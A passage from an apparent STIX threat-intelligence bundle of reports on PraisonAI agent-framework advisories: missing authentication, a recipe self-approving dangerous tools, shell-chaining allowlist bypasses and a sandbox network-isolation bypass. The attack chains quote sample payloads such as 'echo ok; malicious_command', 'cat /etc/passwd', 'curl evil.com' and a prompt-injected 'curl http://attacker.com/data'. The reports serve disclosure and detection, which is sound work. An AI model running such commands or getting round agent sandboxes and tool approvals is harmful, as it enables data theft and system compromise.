        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bff1f6c4-3a65-5114-afa3-9ea6258351d0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fcea5425-e1b2-5583-8a6e-f24b01435903",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1c46fdd-12da-5850-8a1b-893dd6fb950d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fcea5425-e1b2-5583-8a6e-f24b01435903",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dd4c673f-8b7d-5c2f-a73c-2d5af6931568",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Archive Collected Data",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1560",
          "url": "https://attack.mitre.org/techniques/T1560"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--05ce97e2-321f-5a14-bbce-d9c546fb97f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fcea5425-e1b2-5583-8a6e-f24b01435903",
      "target_ref": "attack-pattern--dd4c673f-8b7d-5c2f-a73c-2d5af6931568"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fcea5425-e1b2-5583-8a6e-f24b01435903",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PraisonAI A2U Incomplete Authentication Fix (GHSA-jxcw-qp4h-6jfq)",
      "description": "## Overview\n\nA critical vulnerability exists in PraisonAI, affecting versions `4.5.115` through `4.6.60`, stemming from an incomplete fix for a previously disclosed unauthenticated access issue (GHSA-f292-66h9-fpmf). When an operator starts the A2U (Agent-to-User) event stream server using the documented `praisonai serve a2u` CLI command without explicitly configuring the `A2U_AUTH_TOKEN` environment variable, the server runs without any authentication. This default behavior contradicts the secure-by-default posture implied by the previous fix and current documentation, allowing unauthenticated access to sensitive agent event streams such as responses, tool calls, thinking/progress events, and stream metadata. Attackers can leverage this oversight to gain unauthorized insight into agent activities and potentially exfiltrate sensitive operational data if the server is exposed on a network interface.\n\n## Attack Chain\n\n1.  An operator installs PraisonAI versions between `4.5.115` and `4.6.60`.\n2.  The operator starts the A2U server using the command `praisonai serve a2u --host 0.0.0.0 --port 8002` (or similar) without setting the `A2U_AUTH_TOKEN` environment variable.\n3.  The `_create_a2u_app()` function in `src/praisonai/praisonai/cli/features/serve.py` registers A2U routes.\n4.  The `create_a2u_routes()` function in `src/praisonai/praisonai/endpoints/a2u_server.py` checks for `A2U_AUTH_TOKEN` via `os.environ.get()`.\n5.  Since `A2U_AUTH_TOKEN` is not set, the authentication mechanism (`_authenticate_request()`) returns `None`, effectively disabling authentication for all A2U endpoints.\n6.  An unauthenticated attacker makes an HTTP GET request to `/a2u/info`, `/a2u/subscribe`, or `/a2u/events/{stream_name}` on the exposed PraisonAI A2U server.\n7.  The server responds with sensitive agent event stream data, including agent responses, tool calls, thinking/progress events, and stream metadata, without requiring any credentials.\n8.  The attacker successfully exfiltrates sensitive operational data or gains intelligence on agent activities.\n\n## Impact\n\nAttackers who can reach an unauthenticated PraisonAI A2U server are able to subscribe to sensitive agent event streams without credentials. This exposed data includes agent responses, details of tool calls, internal thinking/progress events, and stream metadata. Organizations relying on PraisonAI and believing the previously announced fix or the secure-by-default documentation may inadvertently deploy the A2U server on network interfaces, exposing these streams. This could lead to the unauthorized disclosure of proprietary operational logic, sensitive internal data processed by agents, or intelligence on ongoing tasks, potentially compromising business operations, intellectual property, or client data.\n\n## Recommendation\n\n*   **Upgrade PraisonAI to a patched version**: Ensure all PraisonAI installations are updated to version `4.6.61` or later, as specified in the affected range `pip:praisonai \u003e= 4.5.115, \u003c 4.6.61`.\n*   **Implement Authentication**: For any PraisonAI A2U server currently deployed, explicitly set the `A2U_AUTH_TOKEN` environment variable before starting the `praisonai serve a2u` command to enforce authentication.\n*   **Deploy the Sigma rules**: Deploy the provided Sigma rules to detect unauthenticated access attempts to A2U endpoints in webserver logs.\n*   **Review deployment configurations**: Audit existing `praisonai serve a2u` deployments to confirm that `--host 0.0.0.0` is not used without proper authentication enabled, or that network segmentation limits access to trusted internal hosts only.\n",
      "published": "2026-06-18T15:00:49Z",
      "labels": [
        "incomplete-fix",
        "authentication-bypass",
        "api-server",
        "misconfiguration",
        "data-exposure",
        "praisonai"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--dd4c673f-8b7d-5c2f-a73c-2d5af6931568"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-jxcw-qp4h-6jfq"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0c91e40c-bdfc-54c2-b5ab-714b444f326b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a499bcc3-e307-540e-b3ce-7a862828d3ea",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a499bcc3-e307-540e-b3ce-7a862828d3ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PraisonAI Recipe Policy Bypass via YAML Workflow Approval",
      "description": "## Overview\n\nA critical policy bypass vulnerability affects PraisonAI, a recipe execution platform, specifically versions `v4.5.87` through `v4.6.57`. The platform's security model intends to block \"dangerous tools\" (e.g., `execute_command`) unless an operator explicitly allows them via `allow_dangerous_tools=True`. However, an untrusted recipe can circumvent this control. By crafting a `workflow.yaml` that declares a default-denied tool within an agent's `tools` section and simultaneously using a top-level `approve:` directive, the recipe can effectively self-approve the dangerous tool. This bypasses the initial security policy that only checks `TEMPLATE.yaml requires.tools`, enabling the recipe to execute arbitrary commands without operator consent. The vulnerability affects both local CLI usage and HTTP recipe-runner deployments, with potentially higher severity if exposed to authenticated users.\n\n## Attack Chain\n\n1.  **Attacker crafts malicious PraisonAI recipe**: The attacker prepares a recipe consisting of a `workflow.yaml` that declares a default-denied critical tool (e.g., `execute_command`) under an agent's `tools` section and includes `approve: [execute_command]` at the top level, while ensuring the `TEMPLATE.yaml requires.tools` section does not list any dangerous tools.\n2.  **Operator runs untrusted recipe**: An operator or user runs the attacker-controlled recipe through the PraisonAI local CLI or an exposed HTTP recipe runner, critically without specifying `allow_dangerous_tools=True`.\n3.  **Initial policy check bypassed**: `PraisonAI`'s `_check_tool_policy()` function inspects only the `TEMPLATE.yaml requires.tools` list. Since the malicious `workflow.yaml` avoids listing dangerous tools there, the recipe passes this initial security gate.\n4.  **`YAMLWorkflowParser` processes `workflow.yaml`**: During the `_execute_steps_workflow()` phase, `YAMLWorkflowParser` parses the `workflow.yaml`, resolving agent-level `tools:` declarations and extracting the top-level `approve:` directives.\n5.  **Workflow self-approves dangerous tools**: The `Workflow.start()` method invokes `set_yaml_approved_tools()`, which registers the tools specified in the `approve:` directive (including the dangerous `execute_command`) within the application's approval context, effectively self-approving them.\n6.  **Agent executes dangerous command**: When the PraisonAI agent within the workflow attempts to utilize the `execute_command` tool, it is treated as pre-approved due to the bypass, allowing the agent to proceed with its execution.\n7.  **Arbitrary command execution**: The `execute_command` tool then executes arbitrary operating system commands specified by the attacker within the `workflow.yaml`, inheriting the privileges of the underlying PraisonAI process.\n8.  **Impact**: This unapproved command execution can lead to remote code execution, data exfiltration, system compromise, or facilitate further lateral movement within the compromised environment.\n\n## Impact\n\nThis policy bypass allows an untrusted recipe to execute arbitrary commands with the privileges of the PraisonAI process. If an operator runs such a recipe, or if a PraisonAI HTTP recipe runner is exposed to users who can choose recipe names or URIs, successful exploitation can lead to full system compromise. The exact trigger for command execution depends on the specific workflow and model/tool-call path, but the core policy boundary is breached before execution. This impacts both local CLI usage of PraisonAI and deployments utilizing the HTTP recipe runner, potentially escalating to an authenticated remote execution issue if the API is accessible.\n\n## Recommendation\n\n*   **Patch `PraisonAI`**: Upgrade `PraisonAI` to version `4.6.61` or later immediately to address the vulnerability described in the GHSA advisory.\n*   **Monitor `process_creation` logs**: Deploy the Sigma rules provided in this brief to detect suspicious command execution originating from `PraisonAI` processes.\n*   **Enable Sysmon logging**: Ensure Sysmon process creation and command line logging (Event ID 1) is enabled on all Windows systems running PraisonAI to facilitate detection of spawned shell processes.\n",
      "published": "2026-06-18T15:01:53Z",
      "labels": [
        "application-vulnerability",
        "policy-bypass",
        "remote-code-execution",
        "praisonai",
        "python"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-7qw2-w5rc-37x2"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--035d04fe-83e6-592d-9088-669643d27d28",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7d1655e-e0a3-55a1-94e3-dc1a3adcd524",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c7d1655e-e0a3-55a1-94e3-dc1a3adcd524",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "npm PraisonAI utility-tools.shell() Allowlist Bypass via Shell Chaining (GHSA-5jv7-2mjm-h6qj)",
      "description": "## Overview\n\nThe npm package `praisonai` has been identified with a command injection vulnerability (GHSA-5jv7-2mjm-h6qj) affecting versions 1.5.1 through 1.7.1. The `utility-tools.shell()` helper, located in `dist/tools/utility-tools.js`, is designed to execute \"safe read-only commands\" by checking only the first whitespace-delimited token against an allowlist (e.g., `ls`, `cat`, `echo`). However, the function then passes the entire input string to Node.js's `child_process.exec()`, which executes it via a system shell. This policy/parser differential allows an attacker to prefix a malicious command with an allowed command and shell metacharacters (e.g., `echo ok; malicious_command`), bypassing the intended allowlist and executing arbitrary commands with the PraisonAI process's privileges. This flaw enables potential file system access, network exfiltration, or denial of service within applications using this vulnerable library.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker identifies an application or service that integrates the `praisonai` library (versions 1.5.1-1.7.1) and exposes functionality that processes user-controlled input through the vulnerable `utility-tools.shell()` helper.\n2.  **Command Crafting**: The attacker crafts a malicious command string. This string starts with a command found in `utility-tools.shell()`'s `safeCommands` allowlist (e.g., `echo`, `ls`) followed by a shell metacharacter (e.g., `;`, `\u0026\u0026`, `|`) and the desired arbitrary command (e.g., `cat /etc/passwd`, `curl evil.com`).\n3.  **Vulnerable Function Call**: The crafted malicious command string is submitted as input to the vulnerable application. The application, in turn, passes this string to the `praisonai`'s `utility-tools.shell()` function.\n4.  **Allowlist Check Bypass**: The `utility-tools.shell()` function performs its safety check by splitting the input string by whitespace and validating only the *first token* (e.g., `echo`) against its internal `safeCommands` allowlist. Since the first token is allowed, the check passes.\n5.  **Shell Execution**: The function proceeds to pass the *entire, unaltered malicious command string* (e.g., `echo; cat /etc/passwd`) to Node.js's `child_process.exec()`.\n6.  **Arbitrary Command Execution**: `child_process.exec()` invokes the system's default shell (e.g., `sh -c` on Linux, `cmd.exe /c` on Windows), which interprets the full string. The shell executes the initial allowed command, then, upon encountering the shell metacharacter, proceeds to execute the appended arbitrary command (e.g., `cat /etc/passwd`).\n7.  **Impact**: The arbitrary command is executed with the privileges of the PraisonAI application process, potentially leading to sensitive data exposure, file modification, network communication, or system disruption, depending on the command and process context.\n\n## Impact\n\nIf an application or service exposes the vulnerable `utility-tools.shell()` helper to untrusted input, the safe-command allowlist becomes ineffective. Attackers can execute arbitrary shell commands with the PraisonAI process privileges. The specific consequences are determined by the embedding application's context and permissions, but can include unauthorized reading of sensitive files and secrets (e.g., credentials, configuration files), modification of files or application state, invocation of local tools, network exfiltration of data if egress is permitted, and denial of service through resource-intensive commands. While no specific victim numbers are available, the broad applicability of Node.js applications means any sector using `praisonai` between versions 1.5.1 and 1.7.1 could be affected.\n\n## Recommendation\n\n*   **Patch Vulnerable Library**: Immediately update `praisonai` to a version higher than 1.7.1 (or explicitly prior to 1.5.1) to address GHSA-5jv7-2mjm-h6qj. The advisory suggests avoiding `exec(command)` for policy-checked strings and instead using `execFile()` or `spawn()` with `shell: false`.\n*   **Deploy Detection Rules**: Implement the provided Sigma rules to detect patterns indicative of this exploitation on both Linux/macOS and Windows hosts that run Node.js applications.\n*   **Review Code for Vulnerable Usage**: Developers should review their codebase for any instances where `praisonai/dist/tools/utility-tools.js` is imported and its `shell()` function is called with user-controlled input. Refactor such calls to ensure input is properly sanitized or leverage safer alternatives as described in the \"Suggested Fix\" section of the advisory (GHSA-5jv7-2mjm-h6qj).\n*   **Enable Detailed Process Logging**: Ensure `process_creation` logging (e.g., via Sysmon on Windows, Auditd/eBPF on Linux) is enabled and configured to capture full command lines, parent-child process relationships, and image paths to effectively utilize the provided Sigma rules.\n",
      "published": "2026-06-18T15:03:35Z",
      "labels": [
        "command-injection",
        "npm-package",
        "nodejs",
        "rce",
        "allowlist-bypass",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-5jv7-2mjm-h6qj"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--92c3d2bc-e878-52e7-8936-2dd291318f79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--30d90dd3-2dbb-56d9-a60a-34fbc0e264fd",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--30d90dd3-2dbb-56d9-a60a-34fbc0e264fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "npm PraisonAI SandboxExecutor allowedCommands bypass via shell chaining",
      "description": "## Overview\n\nThe `npm:praisonai` package, which provides \"safe command execution with restrictions\" via its `SandboxExecutor` and `CommandValidator` components, contains a critical vulnerability affecting versions 1.2.3 through 1.7.1. The `CommandValidator` component incorrectly processes command strings when `allowedCommands` is configured: it only checks the first whitespace-delimited token for allowlisting, while the `SandboxExecutor` subsequently passes the entire, unmodified command string to `spawn(\"sh\", [\"-c\", command])`. This discrepancy allows attackers to append arbitrary shell commands using metacharacters (e.g., `;`, `\u0026\u0026`, `||`) after an allowlisted initial command, bypassing the intended security controls. This allows for arbitrary code execution with the privileges of the PraisonAI process if lower-trust input (such as user prompts or model output) is processed by the vulnerable component. The vulnerability is present in `src/praisonai-ts/src/cli/features/sandbox-executor.ts` and confirmed in distributed `npm:praisonai@1.7.1` files.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious command string that begins with an allowlisted command (e.g., `echo`) followed by shell metacharacters and arbitrary commands (e.g., `echo allowed; cat /tmp/marker`).\n2.  This malicious command string is supplied as input to an application, CLI tool, or agent pipeline that utilizes the `npm:praisonai` library's `SandboxExecutor` or `sandboxExec` function.\n3.  The `CommandValidator` component within `praisonai` receives the command string and checks its `allowedCommands` policy by extracting only the first whitespace-delimited token (e.g., `echo`).\n4.  If the first token matches an entry in the `allowedCommands` list, the `CommandValidator` incorrectly deems the entire command string valid and permits its execution.\n5.  The `SandboxExecutor` proceeds to invoke `spawn('sh', ['-c', malicious_command_string])`, passing the full, unvalidated string directly to the system shell.\n6.  The `sh` process interprets the shell metacharacter (e.g., `;`) as a command separator, executing both the initially allowlisted command and the subsequent arbitrary malicious commands (e.g., `cat /tmp/marker`).\n7.  The attacker achieves arbitrary command execution with the privileges of the PraisonAI process, enabling actions such as reading or modifying files, invoking local tools, or causing denial of service.\n\n## Impact\n\nThe successful exploitation of this vulnerability allows for arbitrary shell command execution within the context of the PraisonAI process. Depending on the privileges of the hosting application and the affected system, this can lead to severe consequences, including unauthorized access to sensitive data (confidentiality), modification or deletion of critical files (integrity), and disruption of service (availability). If the PraisonAI application handles lower-trust input, such as from user prompts or AI model outputs, the risk of compromise is significantly elevated. While the advisory notes a local-only proof-of-concept, the nature of the vulnerability means that any application exposing `SandboxExecutor`'s functionality to external input could be at risk.\n\n## Recommendation\n\n*   Upgrade `npm:praisonai` to a patched version once available. Monitor the official GitHub advisory GHSA-vjv9-7m7j-h833 for release information.\n*   Deploy the provided Sigma rule \"Detect Suspicious `sh -c` Spawns by Node.js with Shell Chaining\" to your SIEM system to identify attempts at exploiting this vulnerability.\n*   Enable comprehensive `process_creation` logging on all Linux systems running Node.js applications that might utilize `npm:praisonai` or similar command execution libraries.\n*   Review applications using `npm:praisonai` versions \u003e= 1.2.3, \u003c= 1.7.1 to ensure that any input passed to `SandboxExecutor` or `sandboxExec` is strictly validated and sanitized, avoiding shell metacharacters.\n*   As a temporary mitigation, if direct patching is not immediately feasible, consider implementing input sanitization at the application layer to strip or escape shell metacharacters before passing commands to `npm:praisonai` functions.\n",
      "published": "2026-06-18T15:04:55Z",
      "labels": [
        "command-injection",
        "npm",
        "nodejs",
        "sandbox-bypass",
        "vulnerability",
        "rce",
        "server-side"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vjv9-7m7j-h833"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35c82cbc-c98b-5d9f-ab53-6c9c39eb3789",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--850dde96-c8dd-5ed8-9ad8-85d7851966bb",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c8b2cad4-c013-54e0-99c6-81566c915674",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--850dde96-c8dd-5ed8-9ad8-85d7851966bb",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6bfc9c89-4576-56e5-ac02-47a2f3a48a2d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--850dde96-c8dd-5ed8-9ad8-85d7851966bb",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--8f95f2bd-f796-5d50-96a0-152891a5e92a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unattributed"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ba2eef0-16dd-5b42-8b6b-3e39db9872e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--850dde96-c8dd-5ed8-9ad8-85d7851966bb",
      "target_ref": "threat-actor--8f95f2bd-f796-5d50-96a0-152891a5e92a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--850dde96-c8dd-5ed8-9ad8-85d7851966bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "npm PraisonAI SandboxExecutor Network Isolation Bypass Vulnerability (GHSA-gqmf-56h7-rrpf)",
      "description": "## Overview\n\nThe npm package `praisonai`, specifically versions 1.2.3 up to and including 1.7.1, is affected by a critical network isolation bypass vulnerability identified as GHSA-gqmf-56h7-rrpf. The `SandboxExecutor` component in `network-isolated` mode, which is advertised to provide \"No network access,\" fails to implement robust OS-level network restrictions. Instead, it only injects proxy environment variables (e.g., `http_proxy`, `https_proxy` set to `localhost:0`) into the child processes. This mechanism is insufficient for true network isolation, as any non-proxy-aware client or direct socket API call within the sandboxed command environment will bypass these variables and establish direct network connections. This flaw undermines the security guarantees applications rely on when executing untrusted or user-supplied code via `praisonai`, potentially enabling attackers to exfiltrate sensitive data or access internal network resources.\n\n## Attack Chain\n\n1.  An attacker crafts malicious input, such as a prompt-injected command, and submits it to an application utilizing the `praisonai` library.\n2.  The vulnerable application executes the attacker-supplied command within the `SandboxExecutor` component, configured for `network-isolated` mode.\n3.  The `SandboxExecutor` spawns a child process (e.g., `sh -c [attacker_controlled_command]`), inheriting environment variables like `http_proxy=http://localhost:0`.\n4.  The attacker-controlled command, for instance, `curl http://attacker.com/data`, executes a non-proxy-aware network client or direct socket API call.\n5.  The non-proxy-aware client or API ignores the injected proxy environment variables and attempts to establish a direct outbound network connection.\n6.  The operating system permits the direct connection, effectively bypassing the intended `network-isolated` sandbox boundary.\n7.  The attacker's command successfully exfiltrates data from the compromised environment or accesses internal network services.\n\n## Impact\n\nThe network isolation bypass in `praisonai` can lead to severe consequences for applications relying on its sandbox for security. If exploited, attackers can circumvent the intended network restrictions to exfiltrate sensitive data (e.g., local files, process output, environment variables) from the sandboxed command context. Furthermore, this vulnerability allows access to localhost services or internal network resources reachable from the host running the `praisonai` instance, potentially enabling lateral movement or further compromise. It can also permit requests to cloud metadata or service endpoints, leading to credential theft or escalation of privileges. Ultimately, the flaw enables bypass of application policies that assume command execution occurs without network access, compromising the integrity and confidentiality of the host system.\n\n## Recommendation\n\n*   **Patch CVE-GHSA-gqmf-56h7-rrpf immediately** by upgrading the `praisonai` npm package to a version that contains a fix, or implement a workaround that employs OS-level network restrictions.\n*   **Deploy the Sigma rules in this brief to your SIEM** to detect suspicious network utility execution originating from processes likely spawned by `praisonai`'s `SandboxExecutor`.\n*   **Enable `process_creation` logging for all Linux servers** that run applications using the `praisonai` package to capture `sh`, `curl`, `wget`, `node`, and `python` command line arguments.\n*   **Review `network_connection` logs** from systems using `praisonai` for outbound connections initiated by non-standard or unexpected processes to external or internal destinations.\n",
      "published": "2026-06-18T15:06:26Z",
      "labels": [
        "vulnerability",
        "npm",
        "sandbox",
        "network-bypass",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "threat-actor--8f95f2bd-f796-5d50-96a0-152891a5e92a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-gqmf-56h7-rrpf"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--41b8c001-80fb-5c54-8fd9-610629b98b22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f84856d-6768-54ee-b699-61601aad49f5",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c2c1be-ce3f-5edf-b12c-7326679223a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1114",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1114",
          "url": "https://attack.mitre.org/techniques/T1114"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6e55e638-a97d-5f6a-871e-4ebcd30c056d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f84856d-6768-54ee-b699-61601aad49f5",
      "target_ref": "attack-pattern--03c2c1be-ce3f-5edf-b12c-7326679223a6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e7515a5-6cba-5638-ab5e-d2aa4c1c74a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f84856d-6768-54ee-b699-61601aad49f5",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Access Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1531",
          "url": "https://attack.mitre.org/techniques/T1531"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6c33d0e5-00a8-57e3-913e-ae281f3a9c96",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f84856d-6768-54ee-b699-61601aad49f5",
      "target_ref": "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4f84856d-6768-54ee-b699-61601aad49f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PraisonAI: IMAP Command Injection via Unsanitized Email Search Parameters",
